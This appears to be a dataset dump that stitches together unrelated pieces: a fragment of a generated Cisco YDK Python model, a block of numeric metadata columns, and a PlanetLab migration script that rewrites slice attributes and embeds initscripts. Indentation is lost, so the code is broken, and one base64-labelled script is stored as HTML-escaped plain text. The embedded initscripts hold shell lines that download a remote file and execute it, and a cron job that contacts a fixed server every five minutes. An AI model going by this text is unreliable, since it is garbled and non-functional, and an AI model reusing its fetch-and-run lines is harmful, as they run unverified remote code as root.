@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.inband is not None and self.inband._has_data():
return True
if self.outband is not None and self.outband._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection']['meta_info']
class Ipv4Identity(MppAfIdBaseIdentity):
"""
IPv4 address family
"""
_prefix = 'Cisco-IOS-XR-lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
MppAfIdBaseIdentity.__init__(self)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['Ipv4Identity']['meta_info']
class Ipv6Identity(MppAfIdBaseIdentity):
"""
IPv6 address family
"""
_prefix = 'Cisco-IOS-XR-lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
MppAfIdBaseIdentity.__init__(self)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['Ipv6Identity']['meta_info']
| 34.004837
| 269
| 0.490861
| 2,817
| 28,122
| 4.682996
| 0.054668
| 0.057611
| 0.072013
| 0.063069
| 0.900925
| 0.887887
| 0.877047
| 0.864615
| 0.864615
| 0.864615
| 0
| 0.021258
| 0.417893
| 28,122
| 826
| 270
| 34.046005
| 0.784606
| 0.236861
| 0
| 0.841823
| 0
| 0.018767
| 0.140253
| 0.09828
| 0
| 0
| 0
| 0
| 0
| 1
| 0.179625
| false
| 0.002681
| 0.0563
| 0.016086
| 0.557641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1efab36210a230086a8000e15777be036b3b0cda
| 36,392
|
py
|
Python
|
tools/slice_attributes.py
|
dreibh/planetlab-lxc-plcapi
|
065dfc54a2b668e99eab343d113f1a31fb154b13
|
[
"BSD-3-Clause"
] | null | null | null |
tools/slice_attributes.py
|
dreibh/planetlab-lxc-plcapi
|
065dfc54a2b668e99eab343d113f1a31fb154b13
|
[
"BSD-3-Clause"
] | null | null | null |
tools/slice_attributes.py
|
dreibh/planetlab-lxc-plcapi
|
065dfc54a2b668e99eab343d113f1a31fb154b13
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env /usr/bin/plcsh
#
# Convert old planetlab3 slice attributes and initscripts to new
# planetlab4 ones.
#
# Mark Huang <mlhuang@cs.princeton.edu>
# Copyright (C) 2006 The Trustees of Princeton University
#
import re
import base64
# Convert nm_net_{exempt_,}{min,max}_rate (bps) to
# net_{i2_,}{min,max}_rate and net_{i2_,}{min,max}_rate (kbps)
rename = {'nm_net_min_rate': 'net_min_rate',
'nm_net_max_rate': 'net_max_rate',
'nm_net_exempt_min_rate': 'net_i2_min_rate',
'nm_net_exempt_max_rate': 'net_i2_max_rate'}
for slice_attribute in GetSliceTags({'name': list(rename.keys())}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Convert bps to kbps
bps = int(slice_attribute['value'])
kbps = bps / 1000
# Add the new attribute
if GetSlices([slice_id]):
AddSliceTag(slice_id, rename[name], str(kbps))
# Delete the old attribute
DeleteSliceTag(id)
# Convert nm_net_{exempt_,}avg_rate to
# net_{i2_,}max_kbyte and net_{i2_,}thresh_kbyte
rename = {'nm_net_avg_rate': {'max': 'net_max_kbyte',
'thresh': 'net_thresh_kbyte'},
'nm_net_exempt_avg_rate': {'max': 'net_i2_max_kbyte',
'thresh': 'net_i2_thresh_kbyte'}}
for slice_attribute in GetSliceTags({'name': list(rename.keys())}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Convert bps to 80% and 100% of max bytes per day
bps = int(slice_attribute['value'])
max_kbyte = bps * 24 * 60 * 60 / 8 / 1000
thresh_kbyte = int(0.8 * max_kbyte)
# Add the new attribute
if GetSlices([slice_id]):
AddSliceTag(slice_id, rename[name]['max'], str(max_kbyte))
AddSliceTag(slice_id, rename[name]['thresh'], str(thresh_kbyte))
# Delete the old attribute
DeleteSliceTag(id)
# Convert plc_slice_state
for slice_attribute in GetSliceTags({'name': 'plc_slice_state'}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Add the new attribute
if GetSlices([slice_id]):
if slice_attribute['value'] == "suspended":
AddSliceTag(slice_id, 'enabled', "0")
else:
AddSliceTag(slice_id, 'enabled', "1")
# Delete the old attribute
DeleteSliceTag(id)
# Straight renames
rename = {'nm_cpu_share': 'cpu_share',
'nm_disk_quota': 'disk_max',
'nm_net_share': 'net_share',
'nm_net_exempt_share': 'net_i2_share',
'nm_net_max_byte': 'net_max_kbyte',
'nm_net_max_thresh_byte': 'net_thresh_kbyte',
'nm_net_max_exempt_byte': 'net_i2_max_kbyte',
'nm_net_max_thresh_exempt_byte': 'net_i2_thresh_kbyte'}
for slice_attribute in GetSliceTags({'name': list(rename.keys())}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Pass straight through
value = slice_attribute['value']
# Add the new attribute
if GetSlices([slice_id]):
AddSliceTag(slice_id, rename[name], value)
# Delete the old attribute
DeleteSliceTag(id)
# Update plc_ticket_pubkey attribute
for slice_attribute in GetSliceTags({'name': "plc_ticket_pubkey"}):
id = slice_attribute['slice_attribute_id']
UpdateSliceTag(id, """
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDKXa72MEKDAnVyzEpKOB1ot2eW
xG/TG2aa7q/2oy1xf5XMmU9H9uKwO+GoUeinp1BSxgkVRF0VhEGGaqKR9kYQzX0k
ht4+P2hAr+UyU4cp0NxV4xfmyAbrNKuHVjawMUCu5BH0IkBUC/89ckxk71oROnak
FbI7ojUezSGr4aVabQIDAQAB
""".lstrip())
# Delete _deleted and deprecated slice attributes and types
for attribute_type in GetSliceTagTypes():
id = attribute_type['attribute_type_id']
name = attribute_type['name']
if name == 'general_prop_share' or \
re.match('nm_', name) or \
re.search('_deleted$', name):
DeleteSliceTagType(id)
# N.B. Automatically deletes all slice attributes of this type
# Add Proper ops
proper_ops = [
# give Stork permission to mount and unmount client dirs
('arizona_stork', 'mount_dir'),
('arizona_stork', 'set_file_flags pass, "1"'),
('arizona_stork', 'set_file_flags_list "1"'),
('arizona_stork', 'bind_socket sockname=64?:*'),
('arizona_stork2', 'mount_dir'),
('arizona_stork2', 'set_file_flags pass, "1"'),
('arizona_stork2', 'set_file_flags_list "1"'),
('arizona_stork2', 'bind_socket sockname=64?:*'),
# give CoMon the necessary permissions to run slicestat
('princeton_slicestat', 'exec "root", pass, "/usr/local/planetlab/bin/pl-ps", none'),
('princeton_slicestat', 'exec "root", pass, "/usr/sbin/vtop", "bn1", none'),
('princeton_slicestat', 'open_file file=/proc/virtual/*/cacct'),
('princeton_slicestat', 'open_file file=/proc/virtual/*/limit'),
('princeton_comon', 'open_file file=/var/log/secure'),
('princeton_comon', 'exec "root", pass, "/bin/df", "/vservers", none'),
# give pl_slicedir access to /etc/passwd
('pl_slicedir', 'open_file pass, "/etc/passwd"'),
# nyu_d are building a DNS demux so give them access to port 53
('nyu_d', 'bind_socket'),
('nyu_oasis', 'bind_socket'),
# QA slices need to be able to create and delete bind-mounts
('pl_qa_0', 'mount_dir'),
('pl_qa_1', 'mount_dir'),
# irb_snort needs packet sockets for tcpdump
('irb_snort', 'create_socket'),
# uw_ankur is using netlink sockets to do the same thing as netflow
('uw_ankur', 'create_socket'),
# cornell_codons gets access to port 53 for now
('cornell_codons', 'create_socket'),
# give Mic Bowman's conf-monitor service read-only access to root fs
# and the ability to run df
('idsl_monitor', 'mount_dir "root:/", pass, "ro"'),
('idsl_monitor', 'unmount'),
('idsl_monitor', 'exec "root", pass, "/bin/df", "-P", "/", "/vservers", none'),
# give Shark access to port 111 to run portmap
# and port 955 to run mount
('nyu_shkr', 'bind_socket'),
('nyu_shkr', 'mount_dir "nfs:**:**"'),
('nyu_shkr', 'exec "root", pass, "/bin/umount", "-l", "/vservers/nyu_shkr/**", none'),
# give tsinghua_lgh access to restricted ports
('tsinghua_lgh', 'bind_socket'),
# CoDeeN needs port 53 too
('princeton_codeen', 'bind_socket sockname=53:*'),
# give ucin_load access to /var/log/wtmp
('ucin_load', 'open_file file=/var/log/wtmp*'),
# give google_highground permission to bind port 81 (and raw sockets)
('google_highground', 'bind_socket'),
# pl_conf needs access to port 814
('pl_conf', 'bind_socket sockname=814:*'),
('pl_conf', 'open file=/home/*/.ssh/authorized_keys'),
# give princeton_visp permission to read all packets sent through the
# tap0 device
('princeton_visp', 'open file=/dev/net/tun, flags=rw'),
# The PLB group needs the BGP port
('princeton_iias', 'bind_socket sockname=179:*'),
('princeton_visp', 'bind_socket sockname=179:*'),
('mit_rcp', 'bind_socket sockname=179:*'),
('princeton_bgpmux', 'bind_socket sockname=179:*'),
('princeton_bgpmux2', 'bind_socket sockname=179:*'),
# PL-VINI group
('mit_rcp', 'exec "root", pass, "/usr/bin/chrt"'),
('princeton_iias', 'exec "root", pass, "/usr/bin/chrt"'),
# Tycoon needs access to /etc/passwd to determine Slicename->XID mappings
('hplabs_tycoon_aucd', 'open_file file=/etc/passwd'),
]
for slice, op in proper_ops:
try:
AddSliceTag(slice, 'proper_op', op)
except Exception as err:
print("Warning: %s:" % slice, err)
initscripts = dict([(initscript['initscript_id'], initscript) for initscript in [{'initscript_id': 8, 'script': '#! /bin/sh

# <Program Name>
#    bindscript
#
# <Author>
#    Jeffry Johnston and Jeremy Plichta
#
# <Purpose>
#    Downloads and installs stork on a node.

# save original PWD
OLDPWD=$PWD

# error reporting function
error()
{
   echo
   echo "Please E-mail stork-support@cs.arizona.edu if you believe you have" 
   echo "received this message in error."

   # get rid of CERT file
   if [ -f $CERT ]
   then
      rm -f $CERT > /dev/null
   fi

   # restore original PWD
   cd $OLDPWD
   exit 1
}

CERT=`pwd`/tempcrtfile

#functions

###
### createCertificate()
###    prints out the equifax certificate to use and stores
###    the file name in $CERT
###
function createCertificate(){
cat > $CERT <<EQUIFAX
-----BEGIN CERTIFICATE-----
MIICkDCCAfmgAwIBAgIBATANBgkqhkiG9w0BAQQFADBaMQswCQYDVQQGEwJV
UzEcMBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEtMCsGA1UEAxMkRXF1
aWZheCBTZWN1cmUgR2xvYmFsIGVCdXNpbmVzcyBDQS0xMB4XDTk5MDYyMTA0
MDAwMFoXDTIwMDYyMTA0MDAwMFowWjELMAkGA1UEBhMCVVMxHDAaBgNVBAoT
E0VxdWlmYXggU2VjdXJlIEluYy4xLTArBgNVBAMTJEVxdWlmYXggU2VjdXJl
IEdsb2JhbCBlQnVzaW5lc3MgQ0EtMTCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAuucXkAJlsTRVPEnCUdXfp9E3j9HngXNBUmCbnaEXJnitx7HoJpQy
td4zjTov2/KaelpzmKNc6fuKcxtc58O/gGzNqfTWK8D3+ZmqY6KxRwIP1ORR
OhI8bIpaVIRw28HFkM9yRcuoWcDNM50/o5brhTMhHD4ePmBudpxnhcXIw2EC
AwEAAaNmMGQwEQYJYIZIAYb4QgEBBAQDAgAHMA8GA1UdEwEB/wQFMAMBAf8w
HwYDVR0jBBgwFoAUvqigdHJQa0S3ySPY+6j/s1draGwwHQYDVR0OBBYEFL6o
oHRyUGtEt8kj2Puo/7NXa2hsMA0GCSqGSIb3DQEBBAUAA4GBADDiAVGqx+pf
2rnQZQ8w1j7aDRRJbpGTJxQx78T3LUX47Me/okENI7SS+RkAZ70Br83gcfxa
z2TE4JaY0KNA4gGK7ycH8WUBikQtBmV1UsCGECAhX2xrD2yuCRyv8qIYNMR1
pHMc8Y3c7635s3a0kr/clRAevsvIO1qEYBlWlKlV
-----END CERTIFICATE----- 
EQUIFAX
}

###
### overWriteConf()
###	overwrite the default stork.conf file
###     that was installed by the rpm package.
###     this is a temporary hack because I need
###     to change the nestport and I dont know
###     enough to repackage the rpm with the
###     correct settings
function overWriteConf(){
cat > /usr/local/stork/etc/stork.conf <<ENDOFFILE
pacman=/usr/local/stork/bin/pacman
dtd-packages=/usr/local/stork/bin/packages.dtd
dtd-groups=/usr/local/stork/bin/groups.dtd
storknestupdatelistenerport=649

#bittorrenttrackerhost=quadrus.cs.arizona.edu
bittorrenttrackerhost=nr06.cs.arizona.edu

bittorrenttrackerport=6880
bittorrentuploadrate=0
bittorrentseedlookuptimeout=30

#packagerepository = quadrus.cs.arizona.edu/PlanetLab/V3|dist, stable
packagerepository = nr06.cs.arizona.edu/PlanetLab/V3|dist, stable
#packageinforepository = quadrus.cs.arizona.edu/PlanetLab/V3/stork.info
packageinforepository = nr06.cs.arizona.edu/PlanetLab/V3/stork.info

username = PlanetLab
publickeyfile = /usr/local/stork/var/keys/PlanetLab.publickey
packagemanagers = nestrpm, rpm, targz
transfermethod= nest,bittorrent,coblitz,coral,http,ftp
nestport=6000
tarpackinfopath=/usr/local/stork/var/tarinfo
ENDOFFILE
} 


###
### downloadNR06()
###    download a file from nr06 using curl
###
### args: 
###       - the path of the file you wish to download
###         relative from https://nr06.cs.arizona.edu
###       - the file to save it to
###       - returned value as specified in verifyDownload
function downloadNR06(){
    curl --cacert $CERT https://nr06.cs.arizona.edu/$1 -o $2 2>/dev/null
    verifyDownload $2 $3
}

###
### verifyDownload()
###     verify that a file that was just download with downloadNR06
###     was download correctly. Since we are getting stuff from a
###     http server we are assuming that if we get a 404 response
###     that the page we want does not exist. Also, if the output file
###     does not exist that means that only headers were returned
###     without any content. this too is a invalid file download
###
### args:
###       - the file to verify
###       - return variable, will have 1 if fail 0 if good
###
function verifyDownload(){
    eval "$2=0"
    if [ ! -f $1 ];
    then
        eval "$2=1"
    elif grep '404 Not Found' $1 > /dev/null
    then
	rm -f $1
        eval "$2=1"
    else
        eval "$2=0"
    fi
}


# check for root user
if [ $UID -ne "0" ]
then
   echo "You must run this program with root permissions..."
   error
fi   
 
# clean up in case this script was run before and failed
rm -rf /tmp/stork &> /dev/null

# create /tmp/stork directory
mkdir /tmp/stork 
if [ $? -ne "0" ]
then
   echo
   echo "Could not create the /tmp/stork directory..."
   error
fi

# export our root directory to Stork
echo "arizona_stork2" > /.exportdir
if [ $? -ne "0" ]
then
   echo
   echo "Could not create the /.exportdir file..."
   error
fi
 
# tell stork that we want to be served
if [ -f /etc/slicename ]
then
   SLICENAME=`cat /etc/slicename`
else 
   SLICENAME=$USER
fi
wget -O /tmp/stork/$SLICENAME "http://localhost:648/$SLICENAME\$bindscript"

# verify that the download was successful
if [ ! -f /tmp/stork/$SLICENAME -o $? -ne 0 ]
then
   echo
   echo "Stork doesn't seem to be running on this node..."
   error
fi

# wait for stork slice 
echo "Waiting for Stork to accept our binding..."
while [ ! -f /tmp/stork/stork_says_go ]
do
   sleep 1
done

# change PWD to the /tmp/stork directory 
cd /tmp/stork
if [ $? -ne "0" ]
then
   echo
   echo "Could not access the /tmp/stork directory..."
   error
fi

# confirm that packages to be installed actually exist
if echo *.rpm | grep '*' > /dev/null
then
   echo
   echo "Error: Stork package download failed..."
   error
fi

# remove Stork packages and files
echo
echo "Removing Stork files..."

# build a list of packages to remove
packages=""
for filename in *.rpm
do
  # convert filename to a package name
  pack=`rpm -qp --qf "%{NAME}\n" $filename`
  if [ $? -eq "0" ]
  then
    packages="$packages $pack"
  fi
done   

# remove old Stork packages
rpm -e $packages &> /dev/null

# remove anything left in /usr/local/stork/bin
rm -rf /usr/local/stork/bin/* &> /dev/null 

# install Stork packages
echo
echo "Installing packages..." 

# build a list of packages to install
packages=""
for filename in *.rpm
do
  packages="$packages $filename"
done   

# install the new stork packages
rpm -i $packages

# report package installation errors
if [ $? -ne "0" ]
then
  echo "Warning: Possible error installing Stork packages..."
fi

# restore original PWD
cd $OLDPWD

# clean up temporary files
rm -rf /tmp/stork &> /dev/null

# SEE TO-DO 1
#create the equifax certificate to use for curl
#createCertificate

# TO-DO 1
# implement the below in the beggining of stork.py
#attempt to download the users public key from the repository
#downloadNR06 "user-upload/pubkeys/$SLICENAME.publickey" "/usr/local/stork/var/$SLICENAME.publickey" RET

#if [ $RET -ne 0 ];
#then
#   echo
#   echo "Could not fetch your public key from the repository."
#   echo "If you want to upload one for the next time you run"
#   echo "the initscript please visit"
#   echo "http://nr06.cs.arizona.edu/testphp/upload.php"
#   echo
#fi

#attempt to download the users stork.conf file from the repository
#downloadNR06 "user-upload/conf/$SLICENAME.stork.conf" "/usr/local/stork/etc/stork.conf.users" RET

#if [ $RET -ne 0 ];
#then
#   echo
#   echo "Could not fetch your stork.conf file from the repository."
#   echo "If you want to upload one for the next time you run"
#   echo "the initscript please visit"
#   echo "http://nr06.cs.arizona.edu/testphp/upload.php"
#   echo "Stork will work without a configuration file but to make one"
#   echo "please place a file named stork.conf in /usr/local/stork/etc"
#   echo "refer to the manual for more directions or email:"
#   echo "stork-support@cs.arizona.edu for additional assistance."
#   echo
#fi

#dont need to overwrite the default conf file
#because it should be fixed in the new rpms
#overWriteConf

# run stork to update keyfiles and download package lists
echo
echo "Attempting to communicate with stork..."
if stork 
then
   echo
   echo "Congratulations, you have successfully bound to stork!"
   echo
   echo "For help, you may type stork --help"
   echo
   #echo "There is also a storkquery command that will provide information"
   #echo "about packages in the repository."
   echo
   echo "For more help, visit the stork project online at"
   echo "http://www.cs.arizona.edu/stork/.  Please contact"
   echo "stork-support@cs.arizona.edu for additional assistance." 
   #rm -f $CERT > /dev/null
else
   echo
   echo "An error occurred during install finalization...  Please contact"
   echo "stork-support@cs.arizona.edu for assistance."
   #rm -f $CERT > /dev/null
   exit 1
fi

# done
exit 0
', 'name': 'arizona_stork_2', 'encoding': 'base64'}, {'initscript_id': 9, 'script': 'IyEvYmluL2Jhc2gNCmNkIC8NCnJtIC1mIHN0YXJ0X3B1cnBsZQ0Kd2dldCBodHRwOi8vd3d3LmNzLnByaW5jZXRvbi5lZHUvfmRlaXNlbnN0L3B1cnBsZS9zdGFydF9wdXJwbGUNCmNobW9kIDc1NSBzdGFydF9wdXJwbGUNCnN1IHByaW5jZXRvbl9wdXJwbGUgLWMgJy4vc3RhcnRfcHVycGxlJw0K', 'name': 'princeton_purple', 'encoding': 'base64'}, {'initscript_id': 6, 'script': 'IyEgL2Jpbi9zaA0KDQojIHNhdmUgb3JpZ2luYWwgUFdEDQpPTERQV0Q9JFBXRA0KDQojIGVycm9yIHJlcG9ydGluZyBmdW5jdGlvbg0KZXJyb3IoKQ0Kew0KICAgZWNobw0KICAgZWNobyAiUGxlYXNlIEUtbWFpbCBzdG9yay1zdXBwb3J0QGNzLmFyaXpvbmEuZWR1IGlmIHlvdSBiZWxpZXZlIHlvdSBoYXZlIiANCiAgIGVjaG8gInJlY2VpdmVkIHRoaXMgbWVzc2FnZSBpbiBlcnJvci4iDQoNCiAgICMgcmVzdG9yZSBvcmlnaW5hbCBQV0QNCiAgIGNkICRPTERQV0QNCiAgIGV4aXQgMQ0KfQ0KDQojIGNoZWNrIGZvciByb290IHVzZXINCmlmIFsgJFVJRCAtbmUgIjAiIF0NCnRoZW4NCiAgIGVjaG8gJ1lvdSBtdXN0IGJlIHJvb3QgdG8gcnVuIHRoaXMgcHJvZ3JhbS4uLicNCiAgIGVycm9yDQpmaSAgIA0KIA0KIyBDbGVhbiB1cCBpbiBjYXNlIEkgcmFuIHRoaXMgYmVmb3JlDQpybSAtZiAvdG1wL3N0b3JrKiA+IC9kZXYvbnVsbCAyPiYxDQoNCiMgRmlyc3Qgb2YgYWxsIGV4cG9ydCBvdXIgcm9vdCBkaXJlY3RvcnkgdG8gU3RvcmsNCmVjaG8gImFyaXpvbmFfc3RvcmsiID4gLy5leHBvcnRkaXINCiANCiMgTm93IHRlbGwgc3RvcmsgdGhhdCB3ZSB3YW50IHRvIGJlIHNlcnZlZA0KaWYgWyAtZiAvZXRjL3NsaWNlbmFtZSBdDQp0aGVuDQogICBTTElDRU5BTUU9YGNhdCAvZXRjL3NsaWNlbmFtZWANCmVsc2UgDQogICBTTElDRU5BTUU9JFVTRVINCmZpDQoNCndnZXQgaHR0cDovL2xvY2FsaG9zdDo2NDAvJFNMSUNFTkFNRQ0KDQojIGNoZWNrIHRvIG1ha2Ugc3VyZSB0aGUgZG93bmxvYWQgd2FzIHN1Y2Nlc3NmdWwNCmlmIFsgISAtZiAkU0xJQ0VOQU1FIC1vICQ/IC1uZSAwIF0NCnRoZW4NCiAgIGVjaG8NCiAgIGVjaG8gIlN0b3JrIGRvZXNuJ3Qgc2VlbSB0byBiZSBydW5uaW5nIG9uIHRoaXMgbm9kZS4uLiINCiAgIGVycm9yDQpmaQ0KDQojIHdhaXQgZm9yIHN0b3JrIHNsaWNlIA0KZWNobyAiV2FpdGluZyBmb3IgU3RvcmsgdG8gYWNjZXB0IG91ciBiaW5kaW5nLi4uIg0Kd2hpbGUgWyAhIC1mIC90bXAvc3Rvcmtfc2F5c19nbyBdDQpkbw0KICAgc2xlZXAgMQ0KZG9uZQ0KDQojIGNoYW5nZSBQV0QgdG8gdGhlIC90bXAgZGlyZWN0b3J5IA0KY2QgL3RtcA0KaWYgWyAkPyAtbmUgIjAiIF0NCnRoZW4NCiAgIGVjaG8NCiAgIGVjaG8gIkNvdWxkIG5vdCBhY2Nlc3MgdGhlIC90bXAgZGlyZWN0b3J5Li4uIg0KICAgZXJyb3INCmZpDQoNCiMgY29uZmlybSB0aGF0IHBhY2thZ2VzIHRvIGJlIGluc3RhbGxlZCBhY3R1YWxseSBleGlzdA0KaWYgZWNobyAqLnJwbSB8IGdyZXAgJyonID4gL2Rldi9udWxsDQp0aGVuDQogICBlY2hvDQogICBlY2hvICJFcnJvcjogU3RvcmsgcGFja2FnZSBkb3dubG9hZCBmYWlsZWQuLi4iDQogICBlcnJvcg0KZmkNCg0KIyBpbnN0YWxsIFN0b3JrIHBhY2thZ2VzDQplY2hvICJJbnN0YWxsaW5nIHBhY2thZ2VzLi4uIiANCmZvciBwYWNrIGluICoucnBtDQpkbw0KICAgIyByZW1vdmUgdGhlIG9sZCBzdG9yayBwYWNrYWdlLCBpZiBhbnkNCiAgIHJwbSAtZSBgcnBtIC1xcCAtLXFmICIle05BTUV9XG4iICRwYWNrYCA+IC9kZXYvbnVsbCAyPiYxDQoNCiAgICMgcmVtb3ZlIGFueXRoaW5nIGxlZnQgaW4gL3Vzci9sb2NhbC9zdG9yay9iaW4NCiAgIHJtIC1yZiAvdXNyL2xvY2FsL3N0b3JrL2Jpbi8qID4gL2Rldi9udWxsIDI+JjENCg0KICAgIyBpbnN0YWxsIHRoZSBuZXcgc3RvcmsgcGFja2FnZQ0KICAgcnBtIC1pICRwYWNrDQoNCiAgICMgcmVwb3J0IHBhY2thZ2UgaW5zdGFsbGF0aW9uIGVycm9ycw0KICAgaWYgWyAkPyAtbmUgIjAiIF0NCiAgIHRoZW4NCiAgICAgZWNobyAiV2FybmluZzogUG9zc2libGUgZXJyb3IgaW5zdGFsbGluZyBTdG9yayBwYWNrYWdlOiAkcGFjay4uLiINCiAgIGZpDQpkb25lDQoNCiMgcmVzdG9yZSBvcmlnaW5hbCBQV0QNCmNkICRPTERQV0QNCg0KIyBjbGVhbiB1cCB0ZW1wb3JhcnkgZmlsZXMNCnJtIC1mIC90bXAvc3RvcmsqID4gL2Rldi9udWxsIDI+JjENCnJtICRTTElDRU5BTUUqIA0KDQojIHJ1biBzdG9yayB0byB1cGRhdGUga2V5ZmlsZXMgYW5kIGRvd25sb2FkIHBhY2thZ2UgbGlzdHMNCmVjaG8gIkF0dGVtcHRpbmcgdG8gY29tbXVuaWNhdGUgd2l0aCBzdG9yay4uLiINCmlmIHN0b3JrIA0KdGhlbg0KICAgZWNobw0KICAgZWNobyAiQ29uZ3JhdHVsYXRpb25zLCB5b3UgaGF2ZSBzdWNjZXNzZnVsbHkgYm91bmQgdG8gc3RvcmshIg0KICAgZWNobw0KICAgZWNobyAiRm9yIGhlbHAsIHlvdSBtYXkgdHlwZSBzdG9yayAtLWhlbHAgIg0KICAgZWNobw0KICAgZWNobyAiVGhlcmUgaXMgYWxzbyBhIHN0b3JrcXVlcnkgY29tbWFuZCB0aGF0IHdpbGwgcHJvdmlkZSBpbmZvcm1hdGlvbiINCiAgIGVjaG8gImFib3V0IHBhY2thZ2VzIGluIHRoZSByZXBvc2l0b3J5LiINCiAgIGVjaG8NCiAgIGVjaG8gIkZvciBtb3JlIGhlbHAsIHZpc2l0IHRoZSBzdG9yayBwcm9qZWN0IG9ubGluZSBhdCINCiAgIGVjaG8gImh0dHA6Ly93d3cuY3MuYXJpem9uYS5lZHUvc3RvcmsvLiAgUGxlYXNlIGNvbnRhY3QiDQogICBlY2hvICJzdG9yay1zdXBwb3J0QGNzLmFyaXpvbmEuZWR1IGZvciBhZGRpdGlvbmFsIGFzc2lzdGFuY2UuIiANCmVsc2UNCiAgIGVjaG8NCiAgIGVjaG8gIkFuIGVycm9yIG9jY3VycmVkIGR1cmluZyBpbnN0YWxsIGZpbmFsaXphdGlvbi4uLiAgUGxlYXNlIGNvbnRhY3QiDQogICBlY2hvICJzdG9yay1zdXBwb3J0QGNzLmFyaXpvbmEuZWR1IGZvciBhc3Npc3RhbmNlLiINCiAgIGV4aXQgMQ0KZmkNCg0KIw0KIyBIZWxsbyBXb3JsZCBkZW1vIGNvZGUNCiMNCg0KIyBQdWJsaWMga2V5IGZvciB0aGlzIGRlbW8NCmNhdCA+L3Vzci9sb2NhbC9zdG9yay92YXIva2V5cy9oZWxsby5wdWJsaWNrZXkgPDwiRU9GIg0KLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1Gd3dEUVlKS29aSWh2Y05BUUVCQlFBRFN3QXdTQUpCQU1XcVE3K2VxQVljNlRPSUJPbkJyRnZqYjlnRVViaWgNCkkxd0Nyeld4a09aa01BcXFmY1RuMW9tcCtLMGd0cUtBK3VaNEIzRGlQRXI0Q0V0Myt5MmJlMGtDQXdFQUFRPT0NCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ0KRU9GDQpzZWQgLWkgLWUgJ3MvXnVzZXJuYW1lLiovdXNlcm5hbWUgPSBoZWxsby8nIC91c3IvbG9jYWwvc3RvcmsvZXRjL3N0b3JrLmNvbmYNCg0KIyBJbnN0YWxsIFJQTQ0Kc3RvcmsgdXBncmFkZSBoZWxsbw0KDQojIGVuZA0KZXhpdCAwDQo=', 'name': 'princeton_hello_stork', 'encoding': 'base64'}, {'initscript_id': 10, 'script': 'IyEvYmluL2Jhc2gNCg0KIyBJbml0IHNjcmlwdCBmb3IgdGhlIFBsYW5ldExhYiAiSGVsbG8gV29ybGQiIGRlbW8gdXNpbmcgR29vZ2xlIEVhcnRoLg0KIyBJbnN0YWxscyBhIGNyb250YWIgZW50cnkgb24gdGhlIG5vZGUgdGhhdCBwaG9uZXMgaG9tZSB0byB0aGUgc2VydmVyDQojIGV2ZXJ5IHRocmVlIG1pbnV0ZXMuDQoNClNFUlZFUj0xMjguMTEyLjEzOS43Mzo4MDQyCQkjIHBsYW5ldGxhYi0zLmNzLnByaW5jZXRvbi5lZHUNCg0KL3Vzci9iaW4vY3VybCAtcyBodHRwOi8vJFNFUlZFUi8NCmVjaG8gIiovNSAqICogKiAqIC91c3IvYmluL2N1cmwgLXMgaHR0cDovLyRTRVJWRVIvIiB8IGNyb250YWIgLQ0KL3NiaW4vY2hrY29uZmlnIGNyb25kIG9uDQo=', 'name': 'princeton_hello', 'encoding': 'base64'}]])
# Convert plc_initscript.initscript_id to raw initscript attribute
for slice_attribute in GetSliceTags({'name': 'plc_initscript'}):
id = slice_attribute['slice_attribute_id']
slice_id = slice_attribute['slice_id']
initscript_id = int(slice_attribute['value'])
# Delete old attribute
DeleteSliceTag(id)
if initscript_id not in initscripts:
print("Warning: Missing initscript %d" % initscript_id)
continue
initscript = base64.b64decode(initscripts[initscript_id]['script'])
# Add as initscript attribute
AddSliceTag(slice_id, 'initscript', initscript)
# Add our custom yum.conf entries
conf_file_id = AddConfFile({
'enabled': True,
'source': 'PlanetLabConf/yum.conf.php?gpgcheck=1&alpha',
'dest': '/etc/yum.conf',
'file_permissions': '644',
'file_owner': 'root',
'file_group': 'root',
'preinstall_cmd': '',
'postinstall_cmd': '',
'error_cmd': '',
'ignore_cmd_errors': False,
'always_update': False})
AddConfFileToNodeGroup(conf_file_id, 'Alpha')
conf_file_id = AddConfFile({
'enabled': True,
'source': 'PlanetLabConf/yum.conf.php?gpgcheck=1&beta',
'dest': '/etc/yum.conf',
'file_permissions': '644',
'file_owner': 'root',
'file_group': 'root',
'preinstall_cmd': '',
'postinstall_cmd': '',
'error_cmd': '',
'ignore_cmd_errors': False,
'always_update': False})
AddConfFileToNodeGroup(conf_file_id, 'Beta')
conf_file_id = AddConfFile({
'enabled': True,
'source': 'PlanetLabConf/yum.conf.php?gpgcheck=1&rollout',
'dest': '/etc/yum.conf',
'file_permissions': '644',
'file_owner': 'root',
'file_group': 'root',
'preinstall_cmd': '',
'postinstall_cmd': '',
'error_cmd': '',
